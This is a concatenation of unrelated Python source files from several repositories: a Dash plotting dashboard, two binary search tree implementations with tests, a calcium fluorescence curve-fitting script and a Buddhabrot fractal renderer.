className='ten columns offset-by-one'))
else:
container.append(html.Div([html.Br(), menu_title], className='ten columns offset-by-one'))
i += 1
kwargs = dict(id=generate_ids(variables['data_title'], column, 'menu'),
className='ten columns offset-by-one',
raw_data=options_functions[back_name]['raw_data'],
column_name=variables['column_name'],
back_name=back_name,
data_title=variables['data_title'],
extra_options=variables['options'])
container.append(components[variables['type']].component(kwargs=kwargs))
menus.append(html.Div(container, className='six columns'))
return menus
# Create Output Containers
@app.callback(
Output('output-container', 'children'),
[Input('graph-selector', 'value')])
def display_controls(back_name):
# Create a unique output container for each pair of dynamic controls
graphs = html.Div(
[dcc.Graph(id=generate_ids(back_name, column, 'graph'),
className='six columns',
style={'text-align': 'center'}) for column in range(columns)])
space = html.Div([
html.Br()
], className='twelve columns offset-by-one')
info = html.Div(
[html.Div(
id=generate_ids(back_name, column, 'info'),
className='six columns',
style={'text-align': 'center'})
for column in range(columns)])
return [graphs, space, info, space]
# Call Graph Function
def generate_output_callback_graph(back_name):
def return_graph(*values):
inp = dict()
for opt in options_properties:
if opt['back_name'] == back_name:
for i, val in enumerate(opt['variables']):
inp[val['data_title']] = values[i]
return options_functions[back_name]['plot'](inp,
options_functions[back_name]['raw_data'],
filter_data(back_name, inp))
return return_graph
# Call Info Function
def generate_output_callback_info(back_name):
def return_info(*values):
inp = dict()
for opt in options_properties:
if opt['back_name'] == back_name:
for i, val in enumerate(opt['variables']):
inp[val['data_title']] = values[i]
infos = options_functions[back_name]['infos'](inp,
options_functions[back_name]['raw_data'],
filter_data(back_name, inp))
return wrap_infos(infos)
return return_info
# Set callbacks from menu
for back_name in [o['value'] for o in app.layout['graph-selector'].options]:
for column in range(columns):
callback_input = []
for opt in options_properties:
if opt['back_name'] == back_name:
for variables in opt['variables']:
callback_input.append(Input(generate_ids(variables['data_title'],
column,
'menu'),
'value'))
app.callback(
Output(
generate_ids(back_name, column, 'graph'), 'figure'),
callback_input)(
generate_output_callback_graph(back_name)
)
app.callback(
Output(
generate_ids(back_name, column, 'info'), 'children'),
callback_input)(
generate_output_callback_info(back_name)
)
# Append css
app.css.append_css({"external_url": "https://codepen.io/JoaoCarabetta/pen/RjzpPB.css"})
if __name__ == '__main__':
app.run_server()
```
#### File: plots/numero_pls_apresentadas/plot.py
```python
import pandas as pd
import plotly.graph_objs as go
from plots.numero_pls_apresentadas.get_raw_data import output
import imp
def draw_plot_1(input, raw_data, filtered_data):
periodo = input['tempo-numero']
# raw_data['dataInicio'] = pd.to_datetime(raw_data['dataInicio'])
# df = raw_data[raw_data['dataInicio'] >= str(periodo[0])]
# df = df[df['dataInicio'] <= str(periodo[1])]
df = filtered_data
anos = df['dataInicio'].dt.year
qtde = df['numero_pls']
trace = [go.Bar(
y=qtde,
x=anos,
opacity=0.75,
text=['Qtde: {}<br>Ano: {}'.format(i, j) for i, j in zip(qtde, anos)],
hoverinfo='text',
name='Ano',
marker=dict(
color='#2DA37D'
),
showlegend=False
)
]
layout = go.Layout(
xaxis=dict(title='Anos'),
yaxis=dict(title='Número de PLs')
)
figure = dict(data=trace, layout=layout)
return figure
# noinspection PyRedeclaration
output = {"plot": draw_plot_1}
```
#### File: viz-parallel/plot_template/plot.py
```python
import pandas as pd
import plotly.graph_objs as go
# Do not change this function name and inputs
def plot(callback_input: dict, raw_data: pd.DataFrame, filtered_data: pd.DataFrame) -> object:
"""
This function is responsible for transforming the raw data into plots.
You can filter the data yourself or use the already filtered DataFrame to plot.
The callback_input is a dict with the information set by the user through the components. The key is the
data-title given in config.py and the value can be an int/float/str/tuple, depending on the component.
The dictionary containing the information has the following structure:
{'name' : 'Mean: ',
'value': int/float/str}
:param callback_input: Filters
:param raw_data: Raw data
:param filtered_data: Already filtered data
:return: Plotly Figure
"""
# NOTE: minimal placeholder (an assumption, not part of the original template) so the
# function runs as written; replace it with the real plot for your data.
figure = dict(data=[go.Scatter(y=filtered_data.iloc[:, 0])], layout=go.Layout())
return figure
# Do not change this
output = {'plot': plot}
if __name__ == '__main__':
pass
``` |
{
"source": "JoaoCarabetta/waze-dash",
"score": 2
} |
#### File: JoaoCarabetta/waze-dash/run_flask.py
```python
import argparse
from slapdash.app import app
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument("--port", metavar="PORT", default=8050, type=int)
parser.add_argument("--host", metavar="HOST", default='0.0.0.0')
parser.add_argument('--debug', action='store_true')
parser.add_argument("--processes", metavar="PROCESSES", type=int, default=1)
parser.add_argument("--threaded", action='store_true')
return parser
def main():
args = argparser().parse_args()
app.server.run(
debug=args.debug,
host=args.host,
port=args.port,
processes=args.processes,
threaded=args.threaded,
)
if __name__ == '__main__':
main()
```
#### File: src/slapdash/__init__.py
```python
from flask import Flask
from dash import Dash
def create_app(config_object='{}.settings'.format(__package__)):
server = Flask(__package__)
# load default settings
server.config.from_object(config_object)
# load additional settings that will override the defaults in settings.py. eg
# $ export SLAPDASH_SETTINGS=/some/path/prod_settings.py
server.config.from_envvar('SLAPDASH_SETTINGS', silent=True)
return server
def create_dash(server):
app = Dash(server=server)
app.title = server.config['TITLE']
app.config.routes_pathname_prefix = server.config['ROUTES_PATHNAME_PREFIX']
# Suppress callback validation as we will be initialising callbacks that target
# element IDs that won't yet occur in the layout.
app.config.supress_callback_exceptions = True
return app
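# Example wiring (a sketch; the real slapdash.app module may differ):
# server = create_app()
# app = create_dash(server)
# app.layout = ...  # layout and callbacks are registered elsewhere in the package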
``` |
{
"source": "joao-carlos-eng/repo",
"score": 2
} |
#### File: joao-carlos-eng/repo/teste01.py
```python
def ola(fulano):
print(f"Olá {fulano} !")
if __name__ == "__main__":
ola("João")
``` |
{
"source": "joaocarlos-losfe/pysimpletree",
"score": 4
} |
#### File: pysimpletree/pysimpletree/binarytree.py
```python
import pickle
class No:
def __init__(self, chave, no_esquerdo, no_direito):
self.chave = chave
self.no_esquerdo = no_esquerdo
self.no_direito = no_direito
def exibir_chave(self):
print(self.chave)
class BinaryTree:
def __init__(self) -> None:
self.raiz = None
self.__total_nos:int = 0
self.array = []
def inserir_chave(self, chave):
"""
Inserts a new key into the tree.
Required parameters: the key to insert
"""
novo_no = No(chave, None, None)
if self.raiz == None:
self.raiz = novo_no
self.__total_nos += 1
else:
no_atual = self.raiz
while True:
no_anterior = no_atual
if chave <= no_atual.chave:
no_atual = no_atual.no_esquerdo
if no_atual == None:
no_anterior.no_esquerdo = novo_no
self.__total_nos += 1
return
else:
no_atual = no_atual.no_direito
if no_atual == None:
no_anterior.no_direito = novo_no
self.__total_nos += 1
return
def get_total_nos(self) -> int:
"""
Returns the number of nodes in the tree
"""
return self.__total_nos
def pre_ordem(self, raiz:No):
"""
Prints the tree elements in pre-order.
Required parameters: 'instance.raiz'
"""
if raiz is not None:
raiz.exibir_chave()
self.pre_ordem(raiz.no_esquerdo)
self.pre_ordem(raiz.no_direito)
def em_ordem(self, raiz:No):
"""
Prints the tree elements in in-order.
Required parameters: 'instance.raiz'
"""
if raiz is not None:
self.em_ordem(raiz.no_esquerdo)
raiz.exibir_chave()
self.em_ordem(raiz.no_direito)
def pos_ordem(self, raiz:No):
"""
Prints the tree elements in post-order.
Required parameters: 'instance.raiz'
"""
if raiz is not None:
self.pos_ordem(raiz.no_esquerdo)
self.pos_ordem(raiz.no_direito)
raiz.exibir_chave()
def altura(self, raiz:No) -> int:
"""
Returns the maximum height of the tree.
Required parameters: 'instance.raiz'
"""
if raiz is None:
return - 1
else:
altura_esquerda = self.altura(raiz.no_esquerdo)
altura_direita = self.altura(raiz.no_direito)
if altura_esquerda < altura_direita:
return altura_direita + 1
else:
return altura_esquerda + 1
def buscar_elemento(self, chave) -> No:
"""
Returns a tree node if the searched element exists, otherwise returns None.
Required parameters: the key to search for
"""
if self.raiz == None:
return None
else:
no_atual = self.raiz
while chave != no_atual.chave:
if chave < no_atual.chave:
no_atual = no_atual.no_esquerdo
else:
no_atual = no_atual.no_direito
# If the search walks off the tree, the key does not exist.
if no_atual is None:
return None
return no_atual
def eh_folha(self, no: No) -> bool:
"""
Checks whether a tree element is a leaf.
Returns True if it is and False otherwise.
Required parameters: a tree node
"""
if no is not None:
if no.no_esquerdo == None and no.no_direito == None:
return True
return False
def no_sucessor(self, apagar:No):
pai_no_sucessor:No = apagar
no_sucessor:No = apagar
no_atual:No = apagar.no_direito
while no_atual != None:
pai_no_sucessor = no_sucessor
no_sucessor = no_atual
no_atual = no_atual.no_esquerdo
if no_sucessor != apagar.no_direito:
pai_no_sucessor.no_esquerdo = no_sucessor.no_direito
no_sucessor.no_direito = apagar.no_direito
return no_sucessor
def remover_chave(self, chave):
"""
Removes a node from the tree.
Required parameters: the key to remove
Returns True if the key is found, otherwise returns False
"""
if self.raiz == None:
return False
no_atual = self.raiz
no_pai = self.raiz
existe_filho_esquerdo = True
while no_atual.chave != chave:
no_pai = no_atual
if chave < no_atual.chave:
no_atual = no_atual.no_esquerdo
existe_filho_esquerdo = True
else:
no_atual = no_atual.no_direito
existe_filho_esquerdo = False
if no_atual == None:
return False
if no_atual.no_esquerdo == None and no_atual.no_direito == None:
if no_atual == self.raiz:
self.raiz = None
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = None
else:
no_pai.no_direito = None
elif no_atual.no_direito == None:
if no_atual == self.raiz:
self.raiz = no_atual.no_esquerdo
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_atual.no_esquerdo
else:
no_pai.no_direito = no_atual.no_esquerdo
elif no_atual.no_esquerdo == None:
if no_atual == self.raiz:
self.raiz = no_atual.no_direito
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_atual.no_direito
else:
no_pai.no_direito = no_atual.no_direito
else:
no_sucessor = self.no_sucessor(no_atual)
if no_atual == self.raiz:
self.raiz = no_sucessor
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_sucessor
else:
no_pai.no_direito = no_sucessor
no_sucessor.no_esquerdo = no_atual.no_esquerdo
return True
def ler_arvore_do_arquivo(self, raiz:No, path:str, nome_arquivo:str):
"""
Required parameters: 'instance.raiz',
path: directory to read the file from;
nome_arquivo: name of the file to read;
"""
print("carregando arquivo...")
try:
arquivo = open(path+"/"+nome_arquivo, 'rb')
self.array = pickle.load(arquivo)
arquivo.close()
if len(self.array) > 0 :
for chave in self.array:
self.inserir_chave(chave)
self.array.clear()
print("carregado com sucesso...")
return True
except:
print("erro ao ler arquivo. verifique o path e nome do arquivo")
return False
def _prencher_array(self, raiz:No):
if raiz is not None:
self.array.append(raiz.chave)
self._prencher_array(raiz.no_esquerdo)
self._prencher_array(raiz.no_direito)
if len(self.array) > 0:
return True
return False
def salvar_arvore_no_arquivo(self, raiz:No, path:str, nome_arquivo:str):
"""
Required parameters: 'instance.raiz'.
path: directory where the file will be saved;
nome_arquivo: name to give the file;
"""
if self._prencher_array(raiz):
try:
arquivo = open(path+"/"+nome_arquivo, 'wb')
pickle.dump(self.array, arquivo)
arquivo.close()
self.array.clear()
print("arvore salva com sucesso..")
return True
except:
print("erro ao ler arquivo. verifique o path e nome do arquivo")
return False
"""
import os
arvore = BinaryTree()
arvore.ler_arvore_do_arquivo(arvore.raiz, "C:/Users/joaoc/Documents/UFPI/POO2/Criação de pacotes em python/pysimpletree/arquivo_arvore", "arquivo_arvore")
arvore.pre_ordem(arvore.raiz)
path = os.getcwd()
arvore.salvar_arvore_no_arquivo(arvore.raiz, os.getcwd(), "arquivo_arvore")
arvore.inserir_chave(5)
arvore.inserir_chave(6)
arvore.inserir_chave(7)
arvore.inserir_chave(4)
arvore.inserir_chave(3)
arvore.inserir_chave(8)
arvore.remover_chave(6)
arvore.remover_chave(4)
arvore.remover_chave(5)
arvore.em_ordem(arvore.raiz)
"""
"""
print("\ntotal de nós da arvore: " + str(arvore.get_total_nos()))
print("\naltura da arvore: " + str(arvore.altura(arvore.raiz)))
dado = arvore.buscar_elemento(7)
if dado != None:
print("elemento encontrado: " + str(dado.chave))
else:
print("elemento não encontrado")
arvore.remover_chave(3)
arvore.remover_chave(7)
arvore.em_ordem(arvore.raiz)
print(arvore.array)
"""
``` |
{
"source": "joaocarmo/calcium",
"score": 3
} |
#### File: joaocarmo/calcium/calcium.py
```python
from __future__ import division
from scipy import stats
from scipy.integrate import quad
from scipy.integrate import simps
import csv
import numpy as np
import matplotlib.pyplot as plt
# --- SETTINGS START --- #
# Show data plots
showPlots = True
# Data sorce
data = 'data_calcium_handling.csv'
# Ignore the first X data points from the source
start = 7
# Where to cutoff the data points for the analysis
cutoff = 25
# ---- SETTINGS END ---- #
# Arrays to hold the raw data
x1 = []
x2 = []
x3 = []
x4 = []
sec = []
# Read the source and pass it to the arrays
with open(data, 'rb') as f:
reader = csv.reader(f)
for row in reader:
x1.append(row[0])
x2.append(row[1])
x3.append(row[2])
x4.append(row[3])
sec.append(row[4])
x1_s = x1[start:]
x2_s = x2[start:]
x3_s = x3[start:]
x4_s = x4[start:]
sec_s = sec[start:]
# New arrays for the treated data
avg_x = []
time = []
# Populate the arrays with the Mean of x1, x2, x3 and x4
for i in range(len(x1_s)):
avg_x.append( np.mean( [ float(x1_s[i]), float(x2_s[i]), float(x3_s[i]), float(x4_s[i]) ] ) )
time.append( float(sec_s[i]) )
# Interpolate as a 3rd degree polinomial
z = np.polyfit(time, avg_x, 3)
p = np.poly1d(z)
avg_fit = p(time)
# Interpolate the first X data points as log f = A + B log t
log_avg_x = np.log(avg_x[:cutoff])
log_time = np.log(time[:cutoff])
slope, intercept, r_value, p_value, std_err = stats.linregress(log_time, log_avg_x)
p2 = np.poly1d([slope, intercept])
avg_log_fit = p2(log_time)
r2_value = r_value ** 2
# Get the value of A from ln A and of B from the slope
A = np.exp(intercept)
B = slope
def f(t):
return A * t ** B
# Integrate the interpolated function
I = quad(f, time[0], time[cutoff])
# Integrate using the data
I_data = simps(avg_x[:cutoff], time[:cutoff])
# Calculate the total area of the rectangle
height = avg_x[0]
width = time[cutoff] - time[0]
total_area = height * width
# Get the differences
diff_I = total_area - I[0]
diff_I_data = total_area - I_data
# Print out the results to the console
print '\nfirst point (' + str(avg_x[0]) + ', ' + str(time[0]) + ')' + '\nlast point (' + str(avg_x[cutoff]) + ', ' + str(time[cutoff]) + ')\n\n'
print '\nlog f(t) = ln A + B x log t\n' + '\nA = ' + str(A) + '\nB = ' + str(slope) + '\nR2 = ' + str(r2_value) + '\n\n'
print '\nthe integral of f(t) = ' + str(A) + ' x t ^ ' + str(B) + '\nfrom ' + str(time[0]) + 's to ' + str(time[cutoff]) + 's is\n\nI-func = ' + str(I[0]) + '\n\n'
print '\nthe numerical integral of the data from the first point to the last is\n\nI-data = ' + str(I_data) + '\n\n'
print '\nthe total area of the rectangle which includes the\nfirst and last points as vertices is\n\nArea = ' + str(total_area) + '\n\n'
print '\nthe difference in area - integral is, respectively\n\nArea - I-func = ' + str(diff_I) + '\nArea - I-data = ' + str(diff_I_data) + '\n\n'
# Plot the graph figures
if showPlots:
fig1 = plt.figure(1)
plt.plot(time, avg_x, 'bx', time, avg_fit, 'r--')
plt.xlabel('time (s)')
plt.ylabel('fluorescence (rfu)')
plt.title('Data with a 3rd degree polynomial fit')
fig2 = plt.figure(2)
plt.plot(log_time, log_avg_x, 'bx', log_time, avg_log_fit, 'r--')
plt.xlabel('log time (s)')
plt.ylabel('log fluorescence (rfu)')
plt.title('Data on a logarithmic scale with a linear fit')
fig3 = plt.figure(3)
plt.plot(time, avg_x, 'bx', time[:cutoff], f(time[:cutoff]), 'r--')
plt.xlabel('time (s)')
plt.ylabel('fluorescence (rfu)')
plt.title('Data with the linear fit')
plt.show()
``` |
{
"source": "joaocarvalhoopen/Binary_Tree_in_Python",
"score": 4
} |
#### File: joaocarvalhoopen/Binary_Tree_in_Python/binary_tree.py
```python
import queue # For bredth first traversal.
# Child tree node.
class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
class BinaryTree:
TRAVERSAL_DEPTH_FIRST_PRE_ORDER = 0
TRAVERSAL_DEPTH_FIRST_IN_ORDER = 1
TRAVERSAL_DEPTH_FIRST_POST_ORDER = 2
TRAVERSAL_BREADTH_FIRST_ORDER = 3
COUNT = 10
def __init__(self):
self.root = None
self.length = 0
def __len__(self):
return self.length
def is_empty(self):
if self.length == 0:
return True
else:
return False
# Internal
def _contains_recursive(self, curr_node, data):
if curr_node == None:
return False
elif curr_node.data == data:
return True
elif data < curr_node.data:
return self._contains_recursive(curr_node.left, data)
else:
return self._contains_recursive(curr_node.right, data)
# Top level.
def __contains__(self, data):
return self._contains_recursive(self.root, data)
# Internal
def _insert_recursive(self, curr_node, data):
if curr_node == None:
self.length += 1
return Node(data)
elif data < curr_node.data:
curr_node.left = self._insert_recursive(curr_node.left, data)
elif curr_node.data < data:
curr_node.right = self._insert_recursive(curr_node.right, data)
return curr_node
# Top level.
def insert(self, data):
self.root = self._insert_recursive(self.root, data)
# Internal
def _min_data(self, curr_node):
if curr_node.left != None:
return self._min_data(curr_node.left)
else:
return curr_node.data
# Internal
def _delete_recursive(self, curr_node, data):
if curr_node == None:
return None
elif curr_node.data == data:
# No child node.
if (curr_node.left == None) and (curr_node.right == None):
self.length -= 1
return None
# One child left.
elif curr_node.right == None:
self.length -= 1
return curr_node.left
# One child rigth.
elif curr_node.left == None:
self.length -= 1
return curr_node.right
# Two children.
else:
self.length -= 1
minData = self._min_data(curr_node.right)
curr_node.data = minData
curr_node.right = self._delete_recursive(curr_node.right, minData)
return curr_node
elif data < curr_node.data:
curr_node.left = self._delete_recursive(curr_node.left, data)
return curr_node
else:
curr_node.right = self._delete_recursive(curr_node.right, data)
return curr_node
# Top level
def __delitem__(self, data):
self.root = self._delete_recursive(self.root, data)
# Internal
def _traversal_depth_first_pre_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
self._traversal_depth_first_pre_order(curr_node.left, lst, apply_func)
self._traversal_depth_first_pre_order(curr_node.right, lst, apply_func)
# Internal
def _traversal_depth_first_in_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
self._traversal_depth_first_in_order(curr_node.left, lst, apply_func)
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
self._traversal_depth_first_in_order(curr_node.right, lst, apply_func)
# Internal
def _traversal_depth_first_post_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
self._traversal_depth_first_post_order(curr_node.left, lst, apply_func)
self._traversal_depth_first_post_order(curr_node.right, lst, apply_func)
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
# Internal
def _traversal_breadth_first_order(self, curr_node, lst, apply_func=None):
if self.root == None:
return
q = queue.Queue()
q.put(self.root)
while(not q.empty()):
curr_node = q.get()
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
if curr_node.left != None:
q.put(curr_node.left)
if curr_node.right != None:
q.put(curr_node.right)
def _prepare_correct_func(self, order):
retFunc = None
if order == self.TRAVERSAL_DEPTH_FIRST_PRE_ORDER:
retFunc = self._traversal_depth_first_pre_order
elif order == self.TRAVERSAL_DEPTH_FIRST_IN_ORDER:
retFunc = self._traversal_depth_first_in_order
elif order == self.TRAVERSAL_DEPTH_FIRST_POST_ORDER:
retFunc = self._traversal_depth_first_post_order
elif order == self.TRAVERSAL_BREADTH_FIRST_ORDER:
retFunc = self._traversal_breadth_first_order
else:
raise AttributeError("Order not recognised!")
return retFunc
# Top level.
def to_list(self, order = TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
lst = []
curr_node = self.root
runFunc = self._prepare_correct_func(order)
runFunc(curr_node, lst, apply_func=None)
return lst
# Top level.
def apply_func(self, apply_func, order = TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
lst = []
curr_node = self.root
run_func = self._prepare_correct_func(order)
run_func(curr_node, lst, apply_func)
return lst
def __iter__(self): # iterate over all keys
# Note: This first version is inefficient because it needs to create a list before iterating.
for x in self.to_list(order=self.TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
yield x
# Note: This second version is efficient.
# It doesn't create a temporary list prior to execution.
# But it doesn't work!!!
# Rat's and double rat's!
# self.apply_func(apply_func=lambda elem: (yield elem), order=self.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
# Internal
def _draw_tree_2D_recursive(self, curr_node, space):
if curr_node == None:
return
# Increment space between levels.
space += self.COUNT
self._draw_tree_2D_recursive(curr_node.right, space)
# Print spaces then the node data.
print("\n", end="")
for i in range(self.COUNT, space):
print(" ", end='')
print(curr_node.data)
self._draw_tree_2D_recursive(curr_node.left, space)
# Top level
def draw_tree_2D(self):
# Initial space is zero.
self._draw_tree_2D_recursive(self.root, space = 0)
def _balance_tree_recursive(self, nodes_lst, start_index, end_index):
# Stop condition.
if start_index > end_index:
return None
# Get middle element.
mid_index = (start_index + end_index) // 2
curr_node = Node(nodes_lst[mid_index])
# By using the index of inorder traversal the subtree nodes
# to the left and to the righ are created.
curr_node.left = self._balance_tree_recursive(nodes_lst, start_index, mid_index-1)
curr_node.right = self._balance_tree_recursive(nodes_lst, mid_index+1, end_index)
return curr_node
# Top level.
# Balance an unbalanded tree.
def balance_tree(self):
nodes_lst = self.to_list()
nodes_lst.sort()
# Creates the balanced binary tree from nodes list.
n = len(nodes_lst)
self.root = self._balance_tree_recursive(nodes_lst, 0, n-1)
###############
# Unit test's #
###############
def test_01(res_lst):
# Test 01
print("\nRunning test 01....\n")
ok = True
tree_01 = BinaryTree()
if tree_01.is_empty() == False:
ok = False
print("Error: In test 01 isEmpty().")
tree_01.insert(1)
if tree_01.is_empty() == True:
ok = False
print("Error: In test 01 isEmpty().")
print("BinaryTree: ", tree_01.to_list())
res_lst.append(ok)
if ok == True:
print("...Test 01 PASSED.")
def test_02(res_lst):
# Test 02
print("\nRunning test 02....\n")
ok = True
tree_02 = BinaryTree()
for i in [0,1,2,3,4]:
tree_02.insert(i)
if len(tree_02) != 5:
ok = False
print("Error: In test 02 insert() or len().")
if not (0 in tree_02 and
1 in tree_02 and
2 in tree_02 and
3 in tree_02 and
4 in tree_02 ) or not ( all( x in tree_02 for x in [0, 1, 2, 3, 4] ) ):
ok = False
print("Error: In test 02 insert() or contains().")
print("BinaryTree: ", tree_02.to_list())
res_lst.append(ok)
if ok == True:
print("...Test 02 PASSED.")
def test_03(res_lst):
# Test 03
print("\nRunning test 03....\n")
ok = True
tree_03 = BinaryTree()
for i in [0,1,2,3,4]:
tree_03.insert(i)
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_00 = len(tree_03)
del tree_03[1]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_01 = len(tree_03)
del tree_03[4]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_02 = len(tree_03)
del tree_03[3]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_03 = len(tree_03)
del tree_03[2]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_04 = len(tree_03)
del tree_03[0]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_05 = len(tree_03)
print(len_05)
if (len_00 != (len_01 + 1)) or (len_00 != (len_02 + 2)) or (len_00 != (len_03 + 3)) or (len_00 != (len_04 + 4)) or (len_00 != (len_05 + 5)):
ok = False
print("Error: In test 03 del().")
res_lst.append(ok)
if ok == True:
print("...Test 03 PASSED.")
def test_04(res_lst):
# Test 04
print("\nRunning test 04....\n")
ok = True
tree_04 = BinaryTree()
for i in [0,3,2,1,4]:
tree_04.insert(i)
print("BinaryTree: ", tree_04.to_list())
tree_04.draw_tree_2D()
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
target_lst = [0, 3, 2, 1, 4]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_IN_ORDER)
target_lst = [0, 1, 2, 3, 4]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_IN_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_POST_ORDER)
target_lst = [1, 2, 4, 3, 0]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_POST_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
target_lst = [0, 3, 2, 4, 1]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_BREADTH_FIRST_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
res_lst.append(ok)
if ok == True:
print("...Test 04 PASSED.")
def test_05(res_lst):
# Test 05
print("\nRunning test 05....\n")
ok = True
tree_05 = BinaryTree()
for i in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 14]:
tree_05.insert(i)
print("BinaryTree: ", tree_05.to_list())
tree_05.draw_tree_2D()
lstInitial = tree_05.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
tree_05.balance_tree()
tree_05.draw_tree_2D()
lst_after_being_balanced = tree_05.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
target_lst = [7, 3, 11, 1, 5, 9, 13, 0, 2, 4, 6, 8, 10, 12, 14]
if (lstInitial != lst_after_being_balanced) and (lst_after_being_balanced != target_lst):
ok = False
print("Error: In test 05 balance_tree() TRAVERSAL_BREADTH_FIRST_ORDER.")
print("to_list() : ", lst_after_being_balanced)
print("to_list() target: ", target_lst)
res_lst.append(ok)
if ok == True:
print("...Test 05 PASSED.")
# A clouser - This is a hack to have access to an object inside a function by only calling a function.
def my_func(my_list_object):
return lambda elem : my_list_object.append(elem)
def test_06(res_lst):
# Test 06
print("\nRunning test 06....\n")
ok = True
tree_06 = BinaryTree()
for i in [0,3,2,1,4]:
tree_06.insert(i)
print("BinaryTree: ", tree_06.to_list())
tree_06.draw_tree_2D()
lst_01 = tree_06.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("to_list() target: ", lst_01)
# This uses the clousure hack, to generate a list by calling the append method of a list like a function.
lst_from_outside = []
apply_func_my_obj = my_func(lst_from_outside)
tree_06.apply_func(apply_func=apply_func_my_obj, order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("apply_func(): ", lst_from_outside, " lst_from_outside")
# Only print's to the screen.
print("begin apply_func() print...")
apply_func_my_func = print
tree_06.apply_func(apply_func=apply_func_my_func, order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("...end apply_func() print.")
if lst_01 != lst_from_outside:
ok = False
print("Error: In test 06 apply_func() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
print("apply_func(): ", lst_from_outside)
print("to_list() target: ", lst_01)
res_lst.append(ok)
if ok == True:
print("...Test 06 PASSED.")
def test_07(res_lst):
# Test 07
print("\nRunning test 07....\n")
ok = True
tree_07 = BinaryTree()
for i in [0,3,2,1,4]:
tree_07.insert(i)
print("BinaryTree: ", tree_07.to_list())
lst_01 = tree_07.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("to_list() target: ", lst_01)
lst_02 = []
for elem in tree_07:
lst_02.append(elem)
print("For __iter__(): ", lst_02)
lst_03 = [elem for elem in tree_07]
print("List comprehension __iter__(): ", lst_03)
if lst_01 != lst_02 and lst_01 != lst_03:
ok = False
print("Error: In test 07 __iter__() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
res_lst.append(ok)
if ok == True:
print("...Test 07 PASSED.")
def runTests():
res = []
test_01(res)
test_02(res)
test_03(res)
test_04(res)
test_05(res)
test_06(res)
test_07(res)
if all(res):
print("\n** PASSED ALL TESTS! **")
if __name__ == "__main__":
print("Start running tests to BinaryTree....\n\n")
runTests()
print("\n...Finished running tests to BinaryTree....")
# Google Python Naming Conventions:
# module_name, package_name, ClassName, method_name, ExceptionName, function_name,
# GLOBAL_CONSTANT_NAME, global_var_name, instance_var_name, function_parameter_name, local_var_name
``` |
{
"source": "joaocarvalhoopen/Fractal_Buddhabrot",
"score": 3
} |
#### File: joaocarvalhoopen/Fractal_Buddhabrot/Buddhabrot.py
```python
import multiprocessing
from numba import prange, jit
import numba
import numpy as np
import random
from PIL import Image
import time
# Iterate the Mandelbrot and return TRUE if the point escapes
#@jit(nogil= True, nopython=True, locals={'x': numba.float32, 'y': numba.float32, 'xnew': numba.float32, 'ynew': numba.float32, 'i': numba.int32, 'n': numba.int32})
@jit
def iterate(x0, y0, n, seq_x, seq_y, NMAX):
x = 0.0
y = 0.0
n = 0
for i in range(0, NMAX):
xnew = x * x - y * y + x0
ynew = 2 * x * y + y0
# seq[i].x = xnew;
seq_x[i] = xnew
seq_y[i] = ynew
if (xnew*xnew + ynew*ynew ) > 10:
n = 1
return((True, i))
x = xnew
y = ynew
return((False, -1))
def write_image(filename, image_array, width, height):
# Find the largest and the lowest density value
biggest = np.amax(image_array)
smallest = np.amin(image_array)
print("Density value range: " + str(smallest) + " to " + str(biggest))
# Write the image
# Raw uncompressed bytes
im = Image.new("RGB", (width, height))
pix = im.load()
for x in range(width):
for y in range(height):
ramp = 2*( image_array[x][y] - smallest) / (biggest - smallest)
if (ramp > 1):
ramp = 1
ramp = ramp**0.5
pix[x,y] = (int(ramp*255), int(ramp*255), int(ramp*255))
im.save(filename, "PNG")
